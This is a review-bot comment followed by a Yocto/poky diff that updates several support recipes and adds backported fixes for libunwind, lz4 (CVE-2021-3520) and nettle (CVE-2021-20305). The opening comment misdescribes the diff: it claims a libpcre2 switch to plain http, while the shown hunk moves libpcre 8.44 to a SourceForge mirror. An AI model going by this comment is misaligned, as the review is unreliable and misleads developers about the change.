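Review bot: The new libpcre2 `SRC_URI` fetches the tarball over plain `http://`, where the line it replaces used `https://`, so the download loses transport integrity and rests entirely on the recipe checksums. The `SRC_URI[...]` checksum lines are outside this hunk; confirm that a `SRC_URI[sha256sum]` entry is present and was not changed along with the mirror switch. If the Yocto mirror serves TLS, prefer `SRC_URI = "https://downloads.yoctoproject.org/mirror/sources/pcre2-${PV}.tar.bz2 \`.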
diff --git a/poky/meta/recipes-support/libpcre/libpcre_8.44.bb b/poky/meta/recipes-support/libpcre/libpcre_8.44.bb index cd80dc7345..3267c5ad72 100644 --- a/poky/meta/recipes-support/libpcre/libpcre_8.44.bb +++ b/poky/meta/recipes-support/libpcre/libpcre_8.44.bb @@ -7,7 +7,7 @@ HOMEPAGE = "http://www.pcre.org" SECTION = "devel" LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENCE;md5=3bb381a66a5385b246d4877922e7511e" -SRC_URI = "https://ftp.pcre.org/pub/pcre/pcre-${PV}.tar.bz2 \ +SRC_URI = "${SOURCEFORGE_MIRROR}/pcre/pcre-${PV}.tar.bz2 \ file://run-ptest \ file://Makefile \ " diff --git a/poky/meta/recipes-support/libpsl/libpsl_0.21.0.bb b/poky/meta/recipes-support/libpsl/libpsl_0.21.0.bb index b2dda191ce..66e64f785c 100644 --- a/poky/meta/recipes-support/libpsl/libpsl_0.21.0.bb +++ b/poky/meta/recipes-support/libpsl/libpsl_0.21.0.bb @@ -19,11 +19,10 @@ SRC_URI[sha256sum] = "41bd1c75a375b85c337b59783f5deb93dbb443fb0a52d257f403df7bd6 UPSTREAM_CHECK_URI = "https://github.com/rockdaboot/libpsl/releases" -DEPENDS = "libidn2" - inherit autotools gettext gtk-doc manpages pkgconfig lib_package -PACKAGECONFIG ??= "" +PACKAGECONFIG ?= "idn2" PACKAGECONFIG[manpages] = "--enable-man,--disable-man,libxslt-native" - +PACKAGECONFIG[icu] = "--enable-runtime=libicu --enable-builtin=libicu,,icu" +PACKAGECONFIG[idn2] = "--enable-runtime=libidn2 --enable-builtin=libidn2,,libidn2 libunistring" BBCLASSEXTEND = "native nativesdk" diff --git a/poky/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb b/poky/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb index 65b32557e7..e42ac30bf2 100644 --- a/poky/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb +++ b/poky/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb 
@@ -7,7 +7,7 @@ SECTION = "x11/gnome/libs" LICENSE = "LGPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=5f30f0716dfdd0d91eb439ebec522ec2" -DEPENDS = "glib-2.0 glib-2.0-native libxml2 sqlite3 intltool-native libpsl" +DEPENDS = "glib-2.0 glib-2.0-native libxml2 sqlite3 libpsl" SHRT_VER = "${@d.getVar('PV').split('.')[0]}.${@d.getVar('PV').split('.')[1]}" diff --git a/poky/meta/recipes-support/libunistring/libunistring_0.9.10.bb b/poky/meta/recipes-support/libunistring/libunistring_0.9.10.bb index 97fac4ecfa..2197b6656d 100644 --- a/poky/meta/recipes-support/libunistring/libunistring_0.9.10.bb +++ b/poky/meta/recipes-support/libunistring/libunistring_0.9.10.bb @@ -18,6 +18,7 @@ LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=6a6a8e020838b23406c81b19c1d46df6 \ file://README;beginline=45;endline=65;md5=08287d16ba8d839faed8d2dc14d7d6a5 \ file://doc/libunistring.texi;md5=287fa6075f78a3c85c1a52b0a92547cd \ " +DEPENDS = "gperf-native" SRC_URI = "${GNU_MIRROR}/libunistring/libunistring-${PV}.tar.gz \ file://iconv-m4-remove-the-test-to-convert-euc-jp.patch \ diff --git a/poky/meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch b/poky/meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch new file mode 100644 index 0000000000..34a1f46b0f --- /dev/null +++ b/poky/meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch 
@@ -0,0 +1,420 @@ +From 51112447b316813ad1ae50ea66feca4eb755a424 Mon Sep 17 00:00:00 2001 +From: Yichao Yu <yyc1992@gmail.com> +Date: Tue, 31 Mar 2020 00:43:32 -0400 +Subject: [PATCH] Fix compilation with -fno-common. + +[Khem Raj] +Making all other archs consistent with IA64 which should not have this problem. +Also move the FIXME to the correct place. + +Also add some minimum comments about this... + +[Philippe Coval] + +Patch ported to v1.3-stable branch, +patch to be used used in openembedded-core dunfell branch (on v1.3.1) +for oniro project. + +Upstream-Status: Backport [https://github.com/libunwind/libunwind/pull/166] +Signed-off-by: Khem Raj <raj.khem@gmail.com> +Thanks-to: Yichao Yu <yyc1992@gmail.com> +Origin: https://github.com/libunwind/libunwind/commit/29e17d8d2ccbca07c423e3089a6d5ae8a1c9cb6e +Relate-to: https://booting.oniroproject.org/distro/oniro/-/issues/191 +Forwarded: https://github.com/libunwind/libunwind/pull/312 +Last-Update: 2021-11-25 +Signed-off-by: Philippe Coval <philippe.coval@huawei.com> +--- + src/aarch64/Ginit.c | 15 +++++++-------- + src/arm/Ginit.c | 15 +++++++-------- + src/coredump/_UPT_get_dyn_info_list_addr.c | 5 +++++ + src/hppa/Ginit.c | 15 +++++++-------- + src/ia64/Ginit.c | 1 + + src/mi/Gfind_dynamic_proc_info.c | 1 + + src/mips/Ginit.c | 15 +++++++-------- + src/ppc32/Ginit.c | 11 +++++++---- + src/ppc64/Ginit.c | 11 +++++++---- + src/ptrace/_UPT_get_dyn_info_list_addr.c | 5 +++++ + src/sh/Ginit.c | 15 +++++++-------- + src/tilegx/Ginit.c | 15 +++++++-------- + src/x86/Ginit.c | 15 +++++++-------- + src/x86_64/Ginit.c | 15 +++++++-------- + 14 files changed, 82 insertions(+), 72 deletions(-) + +diff --git a/src/aarch64/Ginit.c b/src/aarch64/Ginit.c +index 9c4eae82..cb954b15 100644 +--- a/src/aarch64/Ginit.c ++++ b/src/aarch64/Ginit.c +@@ -61,13 +61,6 @@ tdep_uc_addr (ucontext_t *uc, int reg) + + # endif /* UNW_LOCAL_ONLY */ + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +-/* XXX fix me: there is currently no way to 
locate the dyn-info list +- by a remote unwinder. On ia64, this is done via a special +- unwind-table entry. Perhaps something similar can be done with +- DWARF2 unwind info. */ +- + static void + put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg) + { +@@ -78,7 +71,13 @@ static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. ++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +diff --git a/src/arm/Ginit.c b/src/arm/Ginit.c +index 2720d063..0bac0d72 100644 +--- a/src/arm/Ginit.c ++++ b/src/arm/Ginit.c +@@ -57,18 +57,17 @@ tdep_uc_addr (unw_tdep_context_t *uc, int reg) + + # endif /* UNW_LOCAL_ONLY */ + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +-/* XXX fix me: there is currently no way to locate the dyn-info list +- by a remote unwinder. On ia64, this is done via a special +- unwind-table entry. Perhaps something similar can be done with +- DWARF2 unwind info. */ +- + static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. 
++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +diff --git a/src/coredump/_UPT_get_dyn_info_list_addr.c b/src/coredump/_UPT_get_dyn_info_list_addr.c +index 0d119055..739ed056 100644 +--- a/src/coredump/_UPT_get_dyn_info_list_addr.c ++++ b/src/coredump/_UPT_get_dyn_info_list_addr.c +@@ -74,6 +74,11 @@ get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg, + + #else + ++/* XXX fix me: there is currently no way to locate the dyn-info list ++ by a remote unwinder. On ia64, this is done via a special ++ unwind-table entry. Perhaps something similar can be done with ++ DWARF2 unwind info. */ ++ + static inline int + get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg, + int *countp) +diff --git a/src/hppa/Ginit.c b/src/hppa/Ginit.c +index 461e4b93..265455a6 100644 +--- a/src/hppa/Ginit.c ++++ b/src/hppa/Ginit.c +@@ -64,13 +64,6 @@ _Uhppa_uc_addr (ucontext_t *uc, int reg) + + # endif /* UNW_LOCAL_ONLY */ + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +-/* XXX fix me: there is currently no way to locate the dyn-info list +- by a remote unwinder. On ia64, this is done via a special +- unwind-table entry. Perhaps something similar can be done with +- DWARF2 unwind info. */ +- + static void + put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg) + { +@@ -81,7 +74,13 @@ static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. 
++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +diff --git a/src/ia64/Ginit.c b/src/ia64/Ginit.c +index b09a2ad5..8601bb3c 100644 +--- a/src/ia64/Ginit.c ++++ b/src/ia64/Ginit.c +@@ -68,6 +68,7 @@ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + if (!_U_dyn_info_list_addr) + return -UNW_ENOINFO; + #endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. + *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } +diff --git a/src/mi/Gfind_dynamic_proc_info.c b/src/mi/Gfind_dynamic_proc_info.c +index 98d35012..2e7c62e5 100644 +--- a/src/mi/Gfind_dynamic_proc_info.c ++++ b/src/mi/Gfind_dynamic_proc_info.c +@@ -49,6 +49,7 @@ local_find_proc_info (unw_addr_space_t as, unw_word_t ip, unw_proc_info_t *pi, + return -UNW_ENOINFO; + #endif + ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. + list = (unw_dyn_info_list_t *) (uintptr_t) _U_dyn_info_list_addr (); + for (di = list->first; di; di = di->next) + if (ip >= di->start_ip && ip < di->end_ip) +diff --git a/src/mips/Ginit.c b/src/mips/Ginit.c +index 3df170c7..bf7a8f5a 100644 +--- a/src/mips/Ginit.c ++++ b/src/mips/Ginit.c +@@ -69,13 +69,6 @@ tdep_uc_addr (ucontext_t *uc, int reg) + + # endif /* UNW_LOCAL_ONLY */ + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +-/* XXX fix me: there is currently no way to locate the dyn-info list +- by a remote unwinder. On ia64, this is done via a special +- unwind-table entry. Perhaps something similar can be done with +- DWARF2 unwind info. 
*/ +- + static void + put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg) + { +@@ -86,7 +79,13 @@ static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) (intptr_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. ++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +diff --git a/src/ppc32/Ginit.c b/src/ppc32/Ginit.c +index ba302448..7b454558 100644 +--- a/src/ppc32/Ginit.c ++++ b/src/ppc32/Ginit.c +@@ -91,9 +91,6 @@ tdep_uc_addr (ucontext_t *uc, int reg) + + # endif /* UNW_LOCAL_ONLY */ + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +- + static void + put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg) + { +@@ -104,7 +101,13 @@ static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. 
++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +diff --git a/src/ppc64/Ginit.c b/src/ppc64/Ginit.c +index 4c88cd6e..7bfb395a 100644 +--- a/src/ppc64/Ginit.c ++++ b/src/ppc64/Ginit.c +@@ -95,9 +95,6 @@ tdep_uc_addr (ucontext_t *uc, int reg) + + # endif /* UNW_LOCAL_ONLY */ + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +- + static void + put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg) + { +@@ -108,7 +105,13 @@ static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. ++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +diff --git a/src/ptrace/_UPT_get_dyn_info_list_addr.c b/src/ptrace/_UPT_get_dyn_info_list_addr.c +index cc5ed044..16671d45 100644 +--- a/src/ptrace/_UPT_get_dyn_info_list_addr.c ++++ b/src/ptrace/_UPT_get_dyn_info_list_addr.c +@@ -71,6 +71,11 @@ get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg, + + #else + ++/* XXX fix me: there is currently no way to locate the dyn-info list ++ by a remote unwinder. On ia64, this is done via a special ++ unwind-table entry. Perhaps something similar can be done with ++ DWARF2 unwind info. */ ++ + static inline int + get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg, + int *countp) +diff --git a/src/sh/Ginit.c b/src/sh/Ginit.c +index 52988a72..9fe96d2b 100644 +--- a/src/sh/Ginit.c ++++ b/src/sh/Ginit.c +@@ -58,13 +58,6 @@ tdep_uc_addr (ucontext_t *uc, int reg) + + # endif /* UNW_LOCAL_ONLY */ + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +-/* XXX fix me: there is currently no way to locate the dyn-info list +- by a remote unwinder. On ia64, this is done via a special +- unwind-table entry. 
Perhaps something similar can be done with +- DWARF2 unwind info. */ +- + static void + put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg) + { +@@ -75,7 +68,13 @@ static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. ++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +diff --git a/src/tilegx/Ginit.c b/src/tilegx/Ginit.c +index 7564a558..925e6413 100644 +--- a/src/tilegx/Ginit.c ++++ b/src/tilegx/Ginit.c +@@ -64,13 +64,6 @@ tdep_uc_addr (ucontext_t *uc, int reg) + + # endif /* UNW_LOCAL_ONLY */ + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +-/* XXX fix me: there is currently no way to locate the dyn-info list +- by a remote unwinder. On ia64, this is done via a special +- unwind-table entry. Perhaps something similar can be done with +- DWARF2 unwind info. */ +- + static void + put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg) + { +@@ -81,7 +74,13 @@ static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) (intptr_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. 
++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +diff --git a/src/x86/Ginit.c b/src/x86/Ginit.c +index f6b8dc27..3cec74a2 100644 +--- a/src/x86/Ginit.c ++++ b/src/x86/Ginit.c +@@ -54,13 +54,6 @@ tdep_uc_addr (ucontext_t *uc, int reg) + + # endif /* UNW_LOCAL_ONLY */ + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +-/* XXX fix me: there is currently no way to locate the dyn-info list +- by a remote unwinder. On ia64, this is done via a special +- unwind-table entry. Perhaps something similar can be done with +- DWARF2 unwind info. */ +- + static void + put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg) + { +@@ -71,7 +64,13 @@ static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. ++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +diff --git a/src/x86_64/Ginit.c b/src/x86_64/Ginit.c +index b7e8e462..fe6bcc33 100644 +--- a/src/x86_64/Ginit.c ++++ b/src/x86_64/Ginit.c +@@ -49,13 +49,6 @@ static struct unw_addr_space local_addr_space; + + unw_addr_space_t unw_local_addr_space = &local_addr_space; + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +-/* XXX fix me: there is currently no way to locate the dyn-info list +- by a remote unwinder. On ia64, this is done via a special +- unwind-table entry. Perhaps something similar can be done with +- DWARF2 unwind info. 
*/ +- + static void + put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg) + { +@@ -66,7 +59,13 @@ static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. ++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +-- +2.32.0 + diff --git a/poky/meta/recipes-support/libunwind/libunwind_1.3.1.bb b/poky/meta/recipes-support/libunwind/libunwind_1.3.1.bb index 037e04c3c0..8ae94a834c 100644 --- a/poky/meta/recipes-support/libunwind/libunwind_1.3.1.bb +++ b/poky/meta/recipes-support/libunwind/libunwind_1.3.1.bb @@ -7,6 +7,7 @@ SRC_URI = "http://download.savannah.nongnu.org/releases/libunwind/libunwind-${PV file://0004-Fix-build-on-mips-musl.patch \ file://0005-ppc32-Consider-ucontext-mismatches-between-glibc-and.patch \ file://0006-Fix-for-X32.patch \ + file://0001-Fix-compilation-with-fno-common.patch \ " SRC_URI_append_libc-musl = " file://musl-header-conflict.patch" diff --git a/poky/meta/recipes-support/lz4/files/CVE-2021-3520.patch b/poky/meta/recipes-support/lz4/files/CVE-2021-3520.patch new file mode 100644 index 0000000000..5ac8f6691f --- /dev/null +++ b/poky/meta/recipes-support/lz4/files/CVE-2021-3520.patch 
@@ -0,0 +1,27 @@ +From 8301a21773ef61656225e264f4f06ae14462bca7 Mon Sep 17 00:00:00 2001 +From: Jasper Lievisse Adriaanse <j@jasper.la> +Date: Fri, 26 Feb 2021 15:21:20 +0100 +Subject: [PATCH] Fix potential memory corruption with negative memmove() size + +Upstream-Status: Backport +https://github.com/lz4/lz4/commit/8301a21773ef61656225e264f4f06ae14462bca7#diff-7055e9cf14c488aea9837aaf9f528b58ee3c22988d7d0d81d172ec62d94a88a7 +CVE: CVE-2021-3520 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + lib/lz4.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Index: git/lib/lz4.c +=================================================================== +--- git.orig/lib/lz4.c ++++ git/lib/lz4.c +@@ -1665,7 +1665,7 @@ LZ4_decompress_generic( + const size_t dictSize /* note : = 0 if noDict */ + ) + { +- if (src == NULL) { return -1; } ++ if ((src == NULL) || (outputSize < 0)) { return -1; } + + { const BYTE* ip = (const BYTE*) src; + const BYTE* const iend = ip + srcSize; diff --git a/poky/meta/recipes-support/lz4/lz4_1.9.2.bb b/poky/meta/recipes-support/lz4/lz4_1.9.2.bb index 20719fcc58..0c4a0ac807 100644 --- a/poky/meta/recipes-support/lz4/lz4_1.9.2.bb +++ b/poky/meta/recipes-support/lz4/lz4_1.9.2.bb @@ -12,8 +12,9 @@ PE = "1" SRCREV = "fdf2ef5809ca875c454510610764d9125ef2ebbd" -SRC_URI = "git://github.com/lz4/lz4.git;branch=dev \ +SRC_URI = "git://github.com/lz4/lz4.git;branch=dev;protocol=https \ file://run-ptest \ + file://CVE-2021-3520.patch \ " UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>.*)" diff --git a/poky/meta/recipes-support/lzo/lzo_2.10.bb b/poky/meta/recipes-support/lzo/lzo_2.10.bb index 85b14b3c5c..f0c8631aea 100644 --- a/poky/meta/recipes-support/lzo/lzo_2.10.bb +++ b/poky/meta/recipes-support/lzo/lzo_2.10.bb @@ -18,6 +18,8 @@ SRC_URI[sha256sum] = "c0f892943208266f9b6543b3ae308fab6284c5c90e627931446fb49b42 inherit autotools ptest +CVE_PRODUCT = "lzo oberhumer:lzo2" + EXTRA_OECONF = "--enable-shared" do_install_ptest() { 
diff --git a/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch
new file mode 100644
index 0000000000..cfc0f382fa
--- /dev/null
+++ b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch
@@ -0,0 +1,215 @@ +Backport of: + +From a63893791280d441c713293491da97c79c0950fe Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se> +Date: Thu, 11 Mar 2021 19:37:41 +0100 +Subject: [PATCH] New functions ecc_mod_mul_canonical and + ecc_mod_sqr_canonical. + +* ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical): +New functions. +* ecc-internal.h: Declare and document new functions. +* curve448-eh-to-x.c (curve448_eh_to_x): Use ecc_mod_sqr_canonical. +* curve25519-eh-to-x.c (curve25519_eh_to_x): Use ecc_mod_mul_canonical. +* ecc-eh-to-a.c (ecc_eh_to_a): Likewise. +* ecc-j-to-a.c (ecc_j_to_a): Likewise. +* ecc-mul-m.c (ecc_mul_m): Likewise. + +(cherry picked from commit 2bf497ba4d6acc6f352bca015837fad33008565c) + +Upstream-Status: Backport +https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-1.patch +CVE: CVE-2021-20305 dep1 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + ChangeLog | 11 +++++++++++ + curve25519-eh-to-x.c | 6 +----- + curve448-eh-to-x.c | 5 +---- + ecc-eh-to-a.c | 12 ++---------- + ecc-internal.h | 15 +++++++++++++++ + ecc-j-to-a.c | 15 +++------------ + ecc-mod-arith.c | 24 ++++++++++++++++++++++++ + ecc-mul-m.c | 6 ++---- + 8 files changed, 59 insertions(+), 35 deletions(-) + +#diff --git a/ChangeLog b/ChangeLog +#index fd138d82..5cc5c188 100644 +#--- a/ChangeLog +#+++ b/ChangeLog +#@@ -1,3 +1,14 @@ +#+2021-03-11 Niels Möller <nisse@lysator.liu.se> +#+ +#+ * ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical): +#+ New functions. +#+ * ecc-internal.h: Declare and document new functions. +#+ * curve448-eh-to-x.c (curve448_eh_to_x): Use ecc_mod_sqr_canonical. +#+ * curve25519-eh-to-x.c (curve25519_eh_to_x): Use ecc_mod_mul_canonical. +#+ * ecc-eh-to-a.c (ecc_eh_to_a): Likewise. +#+ * ecc-j-to-a.c (ecc_j_to_a): Likewise. +#+ * ecc-mul-m.c (ecc_mul_m): Likewise. +#+ +# 2021-02-17 Niels Möller <nisse@lysator.liu.se> +# +# * Released Nettle-3.7.1. 
+Index: nettle-3.5.1/curve25519-eh-to-x.c +=================================================================== +--- nettle-3.5.1.orig/curve25519-eh-to-x.c ++++ nettle-3.5.1/curve25519-eh-to-x.c +@@ -53,7 +53,6 @@ curve25519_eh_to_x (mp_limb_t *xp, const + #define t2 (scratch + 2*ecc->p.size) + + const struct ecc_curve *ecc = &_nettle_curve25519; +- mp_limb_t cy; + + /* If u = U/W and v = V/W are the coordiantes of the point on the + Edwards curve we get the curve25519 x coordinate as +@@ -69,10 +68,7 @@ curve25519_eh_to_x (mp_limb_t *xp, const + ecc->p.invert (&ecc->p, t1, t0, t2 + ecc->p.size); + + ecc_modp_add (ecc, t0, wp, vp); +- ecc_modp_mul (ecc, t2, t0, t1); +- +- cy = mpn_sub_n (xp, t2, ecc->p.m, ecc->p.size); +- cnd_copy (cy, xp, t2, ecc->p.size); ++ ecc_mod_mul_canonical (&ecc->p, xp, t0, t1, t2); + #undef vp + #undef wp + #undef t0 +Index: nettle-3.5.1/ecc-eh-to-a.c +=================================================================== +--- nettle-3.5.1.orig/ecc-eh-to-a.c ++++ nettle-3.5.1/ecc-eh-to-a.c +@@ -59,9 +59,7 @@ ecc_eh_to_a (const struct ecc_curve *ecc + /* Needs 2*size + scratch for the invert call. 
*/ + ecc->p.invert (&ecc->p, izp, zp, tp + ecc->p.size); + +- ecc_modp_mul (ecc, tp, xp, izp); +- cy = mpn_sub_n (r, tp, ecc->p.m, ecc->p.size); +- cnd_copy (cy, r, tp, ecc->p.size); ++ ecc_mod_mul_canonical (&ecc->p, r, xp, izp, tp); + + if (op) + { +@@ -81,7 +79,5 @@ ecc_eh_to_a (const struct ecc_curve *ecc + } + return; + } +- ecc_modp_mul (ecc, tp, yp, izp); +- cy = mpn_sub_n (r + ecc->p.size, tp, ecc->p.m, ecc->p.size); +- cnd_copy (cy, r + ecc->p.size, tp, ecc->p.size); ++ ecc_mod_mul_canonical (&ecc->p, r + ecc->p.size, yp, izp, tp); + } +Index: nettle-3.5.1/ecc-internal.h +=================================================================== +--- nettle-3.5.1.orig/ecc-internal.h ++++ nettle-3.5.1/ecc-internal.h +@@ -49,6 +49,8 @@ + #define ecc_mod_submul_1 _nettle_ecc_mod_submul_1 + #define ecc_mod_mul _nettle_ecc_mod_mul + #define ecc_mod_sqr _nettle_ecc_mod_sqr ++#define ecc_mod_mul_canonical _nettle_ecc_mod_mul_canonical ++#define ecc_mod_sqr_canonical _nettle_ecc_mod_sqr_canonical + #define ecc_mod_random _nettle_ecc_mod_random + #define ecc_mod _nettle_ecc_mod + #define ecc_mod_inv _nettle_ecc_mod_inv +@@ -263,6 +265,19 @@ ecc_mod_sqr (const struct ecc_modulo *m, + #define ecc_modq_mul(ecc, r, a, b) \ + ecc_mod_mul (&(ecc)->q, (r), (a), (b)) + ++/* These mul and sqr functions produce a canonical result, 0 <= R < M. ++ Requirements on input and output areas are similar to the above ++ functions, except that it is *not* allowed to pass rp = rp + ++ m->size. ++ */ ++void ++ecc_mod_mul_canonical (const struct ecc_modulo *m, mp_limb_t *rp, ++ const mp_limb_t *ap, const mp_limb_t *bp, mp_limb_t *tp); ++ ++void ++ecc_mod_sqr_canonical (const struct ecc_modulo *m, mp_limb_t *rp, ++ const mp_limb_t *ap, mp_limb_t *tp); ++ + /* mod q operations. 
